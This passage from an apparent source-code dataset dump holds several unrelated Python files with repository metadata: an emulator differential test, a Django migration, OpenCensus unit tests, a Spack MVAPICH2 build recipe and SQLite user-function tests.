"pc": ctx.getSymbolicRegisterValue(ctx.registers.pc),
"sp": ctx.getSymbolicRegisterValue(ctx.registers.sp),
"n": ctx.getSymbolicRegisterValue(ctx.registers.n),
"z": ctx.getSymbolicRegisterValue(ctx.registers.z),
"c": ctx.getSymbolicRegisterValue(ctx.registers.c),
"v": ctx.getSymbolicRegisterValue(ctx.registers.v),
}
return ostate
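# Print every field in which the Unicorn (UC) and Triton (TT) states differ.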
def diff_state(state1, state2):
for k, v in list(state1.items()):
if (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: (UC) != (TT)' %(k))
elif not (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: %#x (UC) != %#x (TT)' %(k, v, state2[k]))
return
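# Lockstep differential test: run each instruction of CODE through both
# engines from the same input state, abort on the first divergence, and feed
# Triton's output state back in as the next iteration's input state.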
if __name__ == '__main__':
state = {
"stack": "".join([chr(255 - i) for i in range(256)]),
"heap": "".join([chr(i) for i in range(256)]),
"x0": 0,
"x1": 0,
"x2": 0,
"x3": 0,
"x4": 0,
"x5": 0,
"x6": 0,
"x7": 0,
"x8": 0,
"x9": 0,
"x10": 0,
"x11": 0,
"x12": 0,
"x13": 0,
"x14": 0,
"x15": 0,
"x16": 0,
"x17": 0,
"x18": 0,
"x19": 0,
"x20": 0,
"x21": 0,
"x22": 0,
"x23": 0,
"x24": 0,
"x25": 0,
"x26": 0,
"x27": 0,
"x28": 0,
"x29": 0,
"x30": 0,
"x30": 0,
"pc": ADDR,
"sp": STACK,
"n": 0,
"z": 0,
"c": 0,
"v": 0,
}
for opcode, disassembly in CODE:
try:
uc_state = emu_with_unicorn(opcode, state)
tt_state = emu_with_triton(opcode, state)
except Exception as e:
print('[KO] %s' %(disassembly))
print('\t%s' %(e))
sys.exit(-1)
if uc_state != tt_state:
print('[KO] %s' %(disassembly))
diff_state(uc_state, tt_state)
sys.exit(-1)
print('[OK] %s' %(disassembly))
state = tt_state
sys.exit(0)
| true | true |
1c4a8e4c20813902ae05d3230d53ca2da1867ab2 | 432 | py | Python | vendor/migrations/0006_vendor_sam_url.py | brethauer/mirage | 396f61206bf76f997c0535277af918058aa1b827 | [
"CC0-1.0"
] | null | null | null | vendor/migrations/0006_vendor_sam_url.py | brethauer/mirage | 396f61206bf76f997c0535277af918058aa1b827 | [
"CC0-1.0"
] | null | null | null | vendor/migrations/0006_vendor_sam_url.py | brethauer/mirage | 396f61206bf76f997c0535277af918058aa1b827 | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('vendor', '0005_vendor_sam_exclusion'),
]
operations = [
migrations.AddField(
model_name='vendor',
name='sam_url',
field=models.URLField(null=True),
preserve_default=True,
),
]
| 20.571429 | 48 | 0.597222 | from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('vendor', '0005_vendor_sam_exclusion'),
]
operations = [
migrations.AddField(
model_name='vendor',
name='sam_url',
field=models.URLField(null=True),
preserve_default=True,
),
]
| true | true |
1c4a8e8166224c62899fba51d3fc55b147695668 | 2,248 | py | Python | tests/unit/trace/test_status.py | bshaffer/opencensus-python | c624558c6829982d3464a5df29b48952f1fe23bc | [
"Apache-2.0"
] | null | null | null | tests/unit/trace/test_status.py | bshaffer/opencensus-python | c624558c6829982d3464a5df29b48952f1fe23bc | [
"Apache-2.0"
] | 1 | 2021-06-10T23:59:36.000Z | 2021-06-10T23:59:36.000Z | tests/unit/trace/test_status.py | bshaffer/opencensus-python | c624558c6829982d3464a5df29b48952f1fe23bc | [
"Apache-2.0"
] | 1 | 2019-09-01T06:00:13.000Z | 2019-09-01T06:00:13.000Z | # Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from google.rpc import code_pb2
from opencensus.trace import status as status_module
class TestStatus(unittest.TestCase):
def test_constructor(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
self.assertEqual(status.code, code)
self.assertEqual(status.message, message)
self.assertIsNone(status.details)
def test_format_status_json_with_details(self):
code = 100
message = 'test message'
details = [
{
'@type': 'string',
'field1': 'value',
},
]
status = status_module.Status(
code=code, message=message, details=details)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message,
'details': details
}
self.assertEqual(expected_status_json, status_json)
def test_format_status_json_without_details(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message
}
self.assertEqual(expected_status_json, status_json)
def test_create_from_exception(self):
message = 'test message'
exc = ValueError(message)
status = status_module.Status.from_exception(exc)
self.assertEqual(status.message, message)
self.assertEqual(status.code, code_pb2.UNKNOWN)
| 30.794521 | 74 | 0.656139 |
import unittest
from google.rpc import code_pb2
from opencensus.trace import status as status_module
class TestStatus(unittest.TestCase):
def test_constructor(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
self.assertEqual(status.code, code)
self.assertEqual(status.message, message)
self.assertIsNone(status.details)
def test_format_status_json_with_details(self):
code = 100
message = 'test message'
details = [
{
'@type': 'string',
'field1': 'value',
},
]
status = status_module.Status(
code=code, message=message, details=details)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message,
'details': details
}
self.assertEqual(expected_status_json, status_json)
def test_format_status_json_without_details(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message
}
self.assertEqual(expected_status_json, status_json)
def test_create_from_exception(self):
message = 'test message'
exc = ValueError(message)
status = status_module.Status.from_exception(exc)
self.assertEqual(status.message, message)
self.assertEqual(status.code, code_pb2.UNKNOWN)
| true | true |
1c4a900d6a3357b0f159b0070ace473e54b8c9e3 | 81 | py | Python | CodeWars/7 Kyu/Coding 3min- Father and Son.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | CodeWars/7 Kyu/Coding 3min- Father and Son.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | CodeWars/7 Kyu/Coding 3min- Father and Son.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | def sc(s):
xs = set(s)
return ''.join(c for c in s if c.swapcase() in xs) | 27 | 54 | 0.555556 | def sc(s):
xs = set(s)
return ''.join(c for c in s if c.swapcase() in xs) | true | true |
1c4a91d777b5ea2a8f62b27d050a042816f1964a | 9,570 | py | Python | var/spack/repos/builtin/packages/mvapich2/package.py | NickRF/spack | edecdc3ace7cbf5df2dcc090da3d1827c4099ebc | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/mvapich2/package.py | NickRF/spack | edecdc3ace7cbf5df2dcc090da3d1827c4099ebc | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/mvapich2/package.py | NickRF/spack | edecdc3ace7cbf5df2dcc090da3d1827c4099ebc | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
from spack import *
class Mvapich2(AutotoolsPackage):
"""MVAPICH2 is an MPI implementation for Infiniband networks."""
homepage = "http://mvapich.cse.ohio-state.edu/"
url = "http://mvapich.cse.ohio-state.edu/download/mvapich/mv2/mvapich2-2.2.tar.gz"
list_url = "http://mvapich.cse.ohio-state.edu/downloads/"
version('2.3rc2', '6fcf22fe2a16023b462ef57614daa357')
version('2.3rc1', '386d79ae36b2136d203826465ad8b6cc')
version('2.3a', '87c3fbf8a755b53806fa9ecb21453445')
# Prefer the latest stable release
version('2.3', sha256='01d5fb592454ddd9ecc17e91c8983b6aea0e7559aa38f410b111c8ef385b50dd', preferred=True)
version('2.2', '939b65ebe5b89a5bc822cdab0f31f96e')
version('2.1', '0095ceecb19bbb7fb262131cb9c2cdd6')
version('2.0', '9fbb68a4111a8b6338e476dc657388b4')
provides('mpi')
provides('mpi@:3.0')
variant('debug', default=False,
description='Enable debug info and error messages at run-time')
variant('cuda', default=False,
description='Enable CUDA extension')
variant('regcache', default=True,
description='Enable memory registration cache')
# Accepted values are:
# single - No threads (MPI_THREAD_SINGLE)
# funneled - Only the main thread calls MPI (MPI_THREAD_FUNNELED)
# serialized - User serializes calls to MPI (MPI_THREAD_SERIALIZED)
# multiple - Fully multi-threaded (MPI_THREAD_MULTIPLE)
# runtime - Alias to "multiple"
variant(
'threads',
default='multiple',
values=('single', 'funneled', 'serialized', 'multiple'),
multi=False,
description='Control the level of thread support'
)
# 32 is needed when job size exceeds 32768 cores
variant(
'ch3_rank_bits',
default='32',
values=('16', '32'),
multi=False,
description='Number of bits allocated to the rank field (16 or 32)'
)
variant(
'process_managers',
description='List of the process managers to activate',
values=disjoint_sets(
('auto',), ('slurm',), ('hydra', 'gforker', 'remshell')
).prohibit_empty_set().with_error(
"'slurm' or 'auto' cannot be activated along with "
"other process managers"
).with_default('auto').with_non_feature_values('auto'),
)
variant(
'fabrics',
description='The fabric enabled for this build',
default='psm',
values=(
'psm', 'sock', 'nemesisib', 'nemesis', 'mrail', 'nemesisibtcp',
'nemesistcpib', 'nemesisofi'
)
)
variant(
'alloca',
default=False,
description='Use alloca to allocate temporary memory if available'
)
variant(
'file_systems',
description='List of the ROMIO file systems to activate',
values=auto_or_any_combination_of('lustre', 'gpfs', 'nfs', 'ufs'),
)
depends_on('findutils', type='build')
depends_on('bison', type='build')
depends_on('pkgconfig', type='build')
depends_on('zlib')
depends_on('libpciaccess', when=(sys.platform != 'darwin'))
depends_on('libxml2')
depends_on('cuda', when='+cuda')
depends_on('psm', when='fabrics=psm')
depends_on('rdma-core', when='fabrics=mrail')
depends_on('rdma-core', when='fabrics=nemesisib')
depends_on('rdma-core', when='fabrics=nemesistcpib')
depends_on('rdma-core', when='fabrics=nemesisibtcp')
depends_on('libfabric', when='fabrics=nemesisofi')
filter_compiler_wrappers(
'mpicc', 'mpicxx', 'mpif77', 'mpif90', 'mpifort', relative_root='bin'
)
@property
def libs(self):
query_parameters = self.spec.last_query.extra_parameters
libraries = ['libmpi']
if 'cxx' in query_parameters:
libraries = ['libmpicxx'] + libraries
return find_libraries(
libraries, root=self.prefix, shared=True, recursive=True
)
@property
def process_manager_options(self):
spec = self.spec
other_pms = []
for x in ('hydra', 'gforker', 'remshell'):
if 'process_managers={0}'.format(x) in spec:
other_pms.append(x)
opts = []
if len(other_pms) > 0:
opts = ['--with-pm=%s' % ':'.join(other_pms)]
# See: http://slurm.schedmd.com/mpi_guide.html#mvapich2
if 'process_managers=slurm' in spec:
opts = [
'--with-pmi=pmi2',
'--with-pm=slurm'
]
return opts
@property
def network_options(self):
opts = []
        # Only one 'fabrics' value can be active here, so test each in turn
if 'fabrics=psm' in self.spec:
opts = [
"--with-device=ch3:psm",
"--with-psm={0}".format(self.spec['psm'].prefix)
]
elif 'fabrics=sock' in self.spec:
opts = ["--with-device=ch3:sock"]
elif 'fabrics=nemesistcpib' in self.spec:
opts = ["--with-device=ch3:nemesis:tcp,ib"]
elif 'fabrics=nemesisibtcp' in self.spec:
opts = ["--with-device=ch3:nemesis:ib,tcp"]
elif 'fabrics=nemesisib' in self.spec:
opts = ["--with-device=ch3:nemesis:ib"]
elif 'fabrics=nemesis' in self.spec:
opts = ["--with-device=ch3:nemesis"]
elif 'fabrics=mrail' in self.spec:
opts = ["--with-device=ch3:mrail", "--with-rdma=gen2",
"--disable-mcast"]
elif 'fabrics=nemesisofi' in self.spec:
opts = ["--with-device=ch3:nemesis:ofi",
"--with-ofi={0}".format(self.spec['libfabric'].prefix)]
return opts
@property
def file_system_options(self):
spec = self.spec
fs = []
for x in ('lustre', 'gpfs', 'nfs', 'ufs'):
if 'file_systems={0}'.format(x) in spec:
fs.append(x)
opts = []
if len(fs) > 0:
opts.append('--with-file-system=%s' % '+'.join(fs))
return opts
def setup_environment(self, spack_env, run_env):
spec = self.spec
# mvapich2 configure fails when F90 and F90FLAGS are set
spack_env.unset('F90')
spack_env.unset('F90FLAGS')
if 'process_managers=slurm' in spec:
run_env.set('SLURM_MPI_TYPE', 'pmi2')
def setup_dependent_environment(self, spack_env, run_env, dependent_spec):
spack_env.set('MPICC', join_path(self.prefix.bin, 'mpicc'))
spack_env.set('MPICXX', join_path(self.prefix.bin, 'mpicxx'))
spack_env.set('MPIF77', join_path(self.prefix.bin, 'mpif77'))
spack_env.set('MPIF90', join_path(self.prefix.bin, 'mpif90'))
spack_env.set('MPICH_CC', spack_cc)
spack_env.set('MPICH_CXX', spack_cxx)
spack_env.set('MPICH_F77', spack_f77)
spack_env.set('MPICH_F90', spack_fc)
spack_env.set('MPICH_FC', spack_fc)
def setup_dependent_package(self, module, dependent_spec):
self.spec.mpicc = join_path(self.prefix.bin, 'mpicc')
self.spec.mpicxx = join_path(self.prefix.bin, 'mpicxx')
self.spec.mpifc = join_path(self.prefix.bin, 'mpif90')
self.spec.mpif77 = join_path(self.prefix.bin, 'mpif77')
self.spec.mpicxx_shared_libs = [
join_path(self.prefix.lib, 'libmpicxx.{0}'.format(dso_suffix)),
join_path(self.prefix.lib, 'libmpi.{0}'.format(dso_suffix))
]
@run_before('configure')
def die_without_fortran(self):
# Until we can pass variants such as +fortran through virtual
# dependencies depends_on('mpi'), require Fortran compiler to
# avoid delayed build errors in dependents.
if (self.compiler.f77 is None) or (self.compiler.fc is None):
raise InstallError(
'Mvapich2 requires both C and Fortran compilers!'
)
def configure_args(self):
spec = self.spec
args = [
'--enable-shared',
'--enable-romio',
'--disable-silent-rules',
'--disable-new-dtags',
'--enable-fortran=all',
"--enable-threads={0}".format(spec.variants['threads'].value),
"--with-ch3-rank-bits={0}".format(
spec.variants['ch3_rank_bits'].value),
]
args.extend(self.enable_or_disable('alloca'))
if '+debug' in self.spec:
args.extend([
'--disable-fast',
'--enable-error-checking=runtime',
'--enable-error-messages=all',
# Permits debugging with TotalView
'--enable-g=dbg',
'--enable-debuginfo'
])
else:
args.append('--enable-fast=all')
if '+cuda' in self.spec:
args.extend([
'--enable-cuda',
'--with-cuda={0}'.format(spec['cuda'].prefix)
])
else:
args.append('--disable-cuda')
if '+regcache' in self.spec:
args.append('--enable-registration-cache')
else:
args.append('--disable-registration-cache')
args.extend(self.process_manager_options)
args.extend(self.network_options)
args.extend(self.file_system_options)
return args
| 35.054945 | 109 | 0.591536 |
import sys
from spack import *
class Mvapich2(AutotoolsPackage):
homepage = "http://mvapich.cse.ohio-state.edu/"
url = "http://mvapich.cse.ohio-state.edu/download/mvapich/mv2/mvapich2-2.2.tar.gz"
list_url = "http://mvapich.cse.ohio-state.edu/downloads/"
version('2.3rc2', '6fcf22fe2a16023b462ef57614daa357')
version('2.3rc1', '386d79ae36b2136d203826465ad8b6cc')
version('2.3a', '87c3fbf8a755b53806fa9ecb21453445')
version('2.3', sha256='01d5fb592454ddd9ecc17e91c8983b6aea0e7559aa38f410b111c8ef385b50dd', preferred=True)
version('2.2', '939b65ebe5b89a5bc822cdab0f31f96e')
version('2.1', '0095ceecb19bbb7fb262131cb9c2cdd6')
version('2.0', '9fbb68a4111a8b6338e476dc657388b4')
provides('mpi')
provides('mpi@:3.0')
variant('debug', default=False,
description='Enable debug info and error messages at run-time')
variant('cuda', default=False,
description='Enable CUDA extension')
variant('regcache', default=True,
description='Enable memory registration cache')
variant(
'threads',
default='multiple',
values=('single', 'funneled', 'serialized', 'multiple'),
multi=False,
description='Control the level of thread support'
)
variant(
'ch3_rank_bits',
default='32',
values=('16', '32'),
multi=False,
description='Number of bits allocated to the rank field (16 or 32)'
)
variant(
'process_managers',
description='List of the process managers to activate',
values=disjoint_sets(
('auto',), ('slurm',), ('hydra', 'gforker', 'remshell')
).prohibit_empty_set().with_error(
"'slurm' or 'auto' cannot be activated along with "
"other process managers"
).with_default('auto').with_non_feature_values('auto'),
)
variant(
'fabrics',
description='The fabric enabled for this build',
default='psm',
values=(
'psm', 'sock', 'nemesisib', 'nemesis', 'mrail', 'nemesisibtcp',
'nemesistcpib', 'nemesisofi'
)
)
variant(
'alloca',
default=False,
description='Use alloca to allocate temporary memory if available'
)
variant(
'file_systems',
description='List of the ROMIO file systems to activate',
values=auto_or_any_combination_of('lustre', 'gpfs', 'nfs', 'ufs'),
)
depends_on('findutils', type='build')
depends_on('bison', type='build')
depends_on('pkgconfig', type='build')
depends_on('zlib')
depends_on('libpciaccess', when=(sys.platform != 'darwin'))
depends_on('libxml2')
depends_on('cuda', when='+cuda')
depends_on('psm', when='fabrics=psm')
depends_on('rdma-core', when='fabrics=mrail')
depends_on('rdma-core', when='fabrics=nemesisib')
depends_on('rdma-core', when='fabrics=nemesistcpib')
depends_on('rdma-core', when='fabrics=nemesisibtcp')
depends_on('libfabric', when='fabrics=nemesisofi')
filter_compiler_wrappers(
'mpicc', 'mpicxx', 'mpif77', 'mpif90', 'mpifort', relative_root='bin'
)
@property
def libs(self):
query_parameters = self.spec.last_query.extra_parameters
libraries = ['libmpi']
if 'cxx' in query_parameters:
libraries = ['libmpicxx'] + libraries
return find_libraries(
libraries, root=self.prefix, shared=True, recursive=True
)
@property
def process_manager_options(self):
spec = self.spec
other_pms = []
for x in ('hydra', 'gforker', 'remshell'):
if 'process_managers={0}'.format(x) in spec:
other_pms.append(x)
opts = []
if len(other_pms) > 0:
opts = ['--with-pm=%s' % ':'.join(other_pms)]
if 'process_managers=slurm' in spec:
opts = [
'--with-pmi=pmi2',
'--with-pm=slurm'
]
return opts
@property
def network_options(self):
opts = []
if 'fabrics=psm' in self.spec:
opts = [
"--with-device=ch3:psm",
"--with-psm={0}".format(self.spec['psm'].prefix)
]
elif 'fabrics=sock' in self.spec:
opts = ["--with-device=ch3:sock"]
elif 'fabrics=nemesistcpib' in self.spec:
opts = ["--with-device=ch3:nemesis:tcp,ib"]
elif 'fabrics=nemesisibtcp' in self.spec:
opts = ["--with-device=ch3:nemesis:ib,tcp"]
elif 'fabrics=nemesisib' in self.spec:
opts = ["--with-device=ch3:nemesis:ib"]
elif 'fabrics=nemesis' in self.spec:
opts = ["--with-device=ch3:nemesis"]
elif 'fabrics=mrail' in self.spec:
opts = ["--with-device=ch3:mrail", "--with-rdma=gen2",
"--disable-mcast"]
elif 'fabrics=nemesisofi' in self.spec:
opts = ["--with-device=ch3:nemesis:ofi",
"--with-ofi={0}".format(self.spec['libfabric'].prefix)]
return opts
@property
def file_system_options(self):
spec = self.spec
fs = []
for x in ('lustre', 'gpfs', 'nfs', 'ufs'):
if 'file_systems={0}'.format(x) in spec:
fs.append(x)
opts = []
if len(fs) > 0:
opts.append('--with-file-system=%s' % '+'.join(fs))
return opts
def setup_environment(self, spack_env, run_env):
spec = self.spec
spack_env.unset('F90')
spack_env.unset('F90FLAGS')
if 'process_managers=slurm' in spec:
run_env.set('SLURM_MPI_TYPE', 'pmi2')
def setup_dependent_environment(self, spack_env, run_env, dependent_spec):
spack_env.set('MPICC', join_path(self.prefix.bin, 'mpicc'))
spack_env.set('MPICXX', join_path(self.prefix.bin, 'mpicxx'))
spack_env.set('MPIF77', join_path(self.prefix.bin, 'mpif77'))
spack_env.set('MPIF90', join_path(self.prefix.bin, 'mpif90'))
spack_env.set('MPICH_CC', spack_cc)
spack_env.set('MPICH_CXX', spack_cxx)
spack_env.set('MPICH_F77', spack_f77)
spack_env.set('MPICH_F90', spack_fc)
spack_env.set('MPICH_FC', spack_fc)
def setup_dependent_package(self, module, dependent_spec):
self.spec.mpicc = join_path(self.prefix.bin, 'mpicc')
self.spec.mpicxx = join_path(self.prefix.bin, 'mpicxx')
self.spec.mpifc = join_path(self.prefix.bin, 'mpif90')
self.spec.mpif77 = join_path(self.prefix.bin, 'mpif77')
self.spec.mpicxx_shared_libs = [
join_path(self.prefix.lib, 'libmpicxx.{0}'.format(dso_suffix)),
join_path(self.prefix.lib, 'libmpi.{0}'.format(dso_suffix))
]
@run_before('configure')
def die_without_fortran(self):
if (self.compiler.f77 is None) or (self.compiler.fc is None):
raise InstallError(
'Mvapich2 requires both C and Fortran compilers!'
)
def configure_args(self):
spec = self.spec
args = [
'--enable-shared',
'--enable-romio',
'--disable-silent-rules',
'--disable-new-dtags',
'--enable-fortran=all',
"--enable-threads={0}".format(spec.variants['threads'].value),
"--with-ch3-rank-bits={0}".format(
spec.variants['ch3_rank_bits'].value),
]
args.extend(self.enable_or_disable('alloca'))
if '+debug' in self.spec:
args.extend([
'--disable-fast',
'--enable-error-checking=runtime',
'--enable-error-messages=all',
'--enable-g=dbg',
'--enable-debuginfo'
])
else:
args.append('--enable-fast=all')
if '+cuda' in self.spec:
args.extend([
'--enable-cuda',
'--with-cuda={0}'.format(spec['cuda'].prefix)
])
else:
args.append('--disable-cuda')
if '+regcache' in self.spec:
args.append('--enable-registration-cache')
else:
args.append('--disable-registration-cache')
args.extend(self.process_manager_options)
args.extend(self.network_options)
args.extend(self.file_system_options)
return args
| true | true |
1c4a92c5094d36b0d5c48b0030aed8a13467ea5b | 371 | py | Python | arxiv/base/tests/test_factory.py | ibnesayeed/arxiv-base | 9f49302370272792a0afc78debd039d249844c6c | [
"MIT"
] | 23 | 2019-01-10T22:01:18.000Z | 2022-02-02T10:28:25.000Z | arxiv/base/tests/test_factory.py | ibnesayeed/arxiv-base | 9f49302370272792a0afc78debd039d249844c6c | [
"MIT"
] | 57 | 2018-12-17T16:45:38.000Z | 2021-12-14T14:20:58.000Z | arxiv/base/tests/test_factory.py | cul-it/arxiv-base-ui | a5beadf44c24f72e21313299bfafc1ffb9d28ac7 | [
"MIT"
] | 5 | 2019-01-10T22:01:28.000Z | 2021-11-05T12:25:31.000Z | from unittest import TestCase
from flask import Flask
from arxiv.base.factory import create_web_app
class TestBaseAppFactory(TestCase):
"""Tests for :mod:`arxiv.base.factory`."""
def test_create_web_app(self):
""":func:`.create_web_app` generates a :class:`.Flask` instance."""
app = create_web_app()
self.assertIsInstance(app, Flask)
| 26.5 | 75 | 0.703504 | from unittest import TestCase
from flask import Flask
from arxiv.base.factory import create_web_app
class TestBaseAppFactory(TestCase):
def test_create_web_app(self):
app = create_web_app()
self.assertIsInstance(app, Flask)
| true | true |
1c4a940d0cdd6c7b7b1ab2fcfcbb3402c6214e07 | 18,464 | py | Python | pypy3.9-v7.3.9-win64/Lib/sqlite3/test/userfunctions.py | LawrenceZ1A/MultipurposeProject | 54d5898301d01c33dd771b29e2e19e20d3875a21 | [
"Apache-2.0"
] | null | null | null | pypy3.9-v7.3.9-win64/Lib/sqlite3/test/userfunctions.py | LawrenceZ1A/MultipurposeProject | 54d5898301d01c33dd771b29e2e19e20d3875a21 | [
"Apache-2.0"
] | 1 | 2022-02-22T00:59:49.000Z | 2022-02-22T00:59:49.000Z | pypy3.9-v7.3.9-win64/Lib/sqlite3/test/userfunctions.py | LawrenceZ1A/MultipurposeProject | 54d5898301d01c33dd771b29e2e19e20d3875a21 | [
"Apache-2.0"
] | 1 | 2022-03-30T11:42:37.000Z | 2022-03-30T11:42:37.000Z | # pysqlite2/test/userfunctions.py: tests for user-defined functions and
# aggregates.
#
# Copyright (C) 2005-2007 Gerhard Häring <[email protected]>
#
# This file is part of pysqlite.
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
#
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
#
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
import unittest
import unittest.mock
import sqlite3 as sqlite
def func_returntext():
return "foo"
def func_returntextwithnull():
return "1\x002"
def func_returnunicode():
return "bar"
def func_returnint():
return 42
def func_returnfloat():
return 3.14
def func_returnnull():
return None
def func_returnblob():
return b"blob"
def func_returnlonglong():
return 1<<31
def func_raiseexception():
5/0
def func_isstring(v):
return type(v) is str
def func_isint(v):
return type(v) is int
def func_isfloat(v):
return type(v) is float
def func_isnone(v):
return type(v) is type(None)
def func_isblob(v):
return isinstance(v, (bytes, memoryview))
def func_islonglong(v):
return isinstance(v, int) and v >= 1<<31
def func(*args):
return len(args)
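# The Aggr* classes below are deliberately broken in different ways (missing
# step/finalize methods, exceptions raised in __init__/step/finalize) to
# exercise the error paths of create_aggregate(); AggrCheckType(s), AggrSum
# and AggrText cover the working cases.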
class AggrNoStep:
def __init__(self):
pass
def finalize(self):
return 1
class AggrNoFinalize:
def __init__(self):
pass
def step(self, x):
pass
class AggrExceptionInInit:
def __init__(self):
5/0
def step(self, x):
pass
def finalize(self):
pass
class AggrExceptionInStep:
def __init__(self):
pass
def step(self, x):
5/0
def finalize(self):
return 42
class AggrExceptionInFinalize:
def __init__(self):
pass
def step(self, x):
pass
def finalize(self):
5/0
class AggrCheckType:
def __init__(self):
self.val = None
def step(self, whichType, val):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
self.val = int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrCheckTypes:
def __init__(self):
self.val = 0
def step(self, whichType, *vals):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
for val in vals:
self.val += int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrSum:
def __init__(self):
self.val = 0.0
def step(self, val):
self.val += val
def finalize(self):
return self.val
class AggrText:
def __init__(self):
self.txt = ""
def step(self, txt):
self.txt = self.txt + txt
def finalize(self):
return self.txt
class FunctionTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.create_function("returntext", 0, func_returntext)
self.con.create_function("returntextwithnull", 0, func_returntextwithnull)
self.con.create_function("returnunicode", 0, func_returnunicode)
self.con.create_function("returnint", 0, func_returnint)
self.con.create_function("returnfloat", 0, func_returnfloat)
self.con.create_function("returnnull", 0, func_returnnull)
self.con.create_function("returnblob", 0, func_returnblob)
self.con.create_function("returnlonglong", 0, func_returnlonglong)
self.con.create_function("raiseexception", 0, func_raiseexception)
self.con.create_function("isstring", 1, func_isstring)
self.con.create_function("isint", 1, func_isint)
self.con.create_function("isfloat", 1, func_isfloat)
self.con.create_function("isnone", 1, func_isnone)
self.con.create_function("isblob", 1, func_isblob)
self.con.create_function("islonglong", 1, func_islonglong)
self.con.create_function("spam", -1, func)
self.con.execute("create table test(t text)")
def tearDown(self):
self.con.close()
def CheckFuncErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, lambda x: 2*x)
def CheckFuncRefCount(self):
def getfunc():
def f():
return 1
return f
f = getfunc()
globals()["foo"] = f
# self.con.create_function("reftest", 0, getfunc())
self.con.create_function("reftest", 0, f)
cur = self.con.cursor()
cur.execute("select reftest()")
def CheckFuncReturnText(self):
cur = self.con.cursor()
cur.execute("select returntext()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "foo")
def CheckFuncReturnTextWithNullChar(self):
cur = self.con.cursor()
res = cur.execute("select returntextwithnull()").fetchone()[0]
self.assertEqual(type(res), str)
self.assertEqual(res, "1\x002")
def CheckFuncReturnUnicode(self):
cur = self.con.cursor()
cur.execute("select returnunicode()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "bar")
def CheckFuncReturnInt(self):
cur = self.con.cursor()
cur.execute("select returnint()")
val = cur.fetchone()[0]
self.assertEqual(type(val), int)
self.assertEqual(val, 42)
def CheckFuncReturnFloat(self):
cur = self.con.cursor()
cur.execute("select returnfloat()")
val = cur.fetchone()[0]
self.assertEqual(type(val), float)
if val < 3.139 or val > 3.141:
self.fail("wrong value")
def CheckFuncReturnNull(self):
cur = self.con.cursor()
cur.execute("select returnnull()")
val = cur.fetchone()[0]
self.assertEqual(type(val), type(None))
self.assertEqual(val, None)
def CheckFuncReturnBlob(self):
cur = self.con.cursor()
cur.execute("select returnblob()")
val = cur.fetchone()[0]
self.assertEqual(type(val), bytes)
self.assertEqual(val, b"blob")
def CheckFuncReturnLongLong(self):
cur = self.con.cursor()
cur.execute("select returnlonglong()")
val = cur.fetchone()[0]
self.assertEqual(val, 1<<31)
def CheckFuncException(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select raiseexception()")
cur.fetchone()
self.assertEqual(str(cm.exception), 'user-defined function raised exception')
def CheckParamString(self):
cur = self.con.cursor()
for text in ["foo", str()]:
with self.subTest(text=text):
cur.execute("select isstring(?)", (text,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamInt(self):
cur = self.con.cursor()
cur.execute("select isint(?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select isfloat(?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamNone(self):
cur = self.con.cursor()
cur.execute("select isnone(?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select isblob(?)", (memoryview(b"blob"),))
